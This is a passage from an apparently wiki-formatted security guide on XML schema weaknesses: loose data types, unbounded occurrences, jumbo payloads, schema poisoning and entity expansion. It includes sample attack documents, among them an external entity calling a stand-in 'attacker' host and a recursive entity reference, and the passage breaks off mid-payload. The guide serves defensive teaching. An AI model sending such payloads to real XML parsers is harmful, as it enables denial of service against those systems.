  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;11111..(1.000.000digits)..11111&amp;lt;/age&amp;gt;&lt;br /&gt;
&amp;lt;/person&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element name='CipherData' type='xenc:CipherDataType'/&amp;gt;&lt;br /&gt;
&amp;lt;complexType name='CipherDataType'&amp;gt;&lt;br /&gt;
  &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name='CipherValue' type='base64Binary'/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref='xenc:CipherReference'/&amp;gt;&lt;br /&gt;
  &amp;lt;/choice&amp;gt;&lt;br /&gt;
&amp;lt;/complexType&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* negativeInteger: Only negative numbers&lt;br /&gt;
* nonNegativeInteger: Negative numbers and the zero value&lt;br /&gt;
* positiveInteger: Only positive numbers&lt;br /&gt;
* nonPositiveInteger: Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;1&amp;lt;/quantity&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values Infinity and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type decimal is recommended:&lt;br /&gt;
&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
Code Sample 23: An XML Schema providing a set of restrictions over the document on Code 18&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minLength value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
•	Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
•	Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER LARGENAME1=&amp;quot;LARGEVALUE&amp;quot; LARGENAME2=&amp;quot; LARGEVALUE&amp;quot; LARGENAME3=&amp;quot; LARGEVALUE&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ENTITY file SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;file;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy . &lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
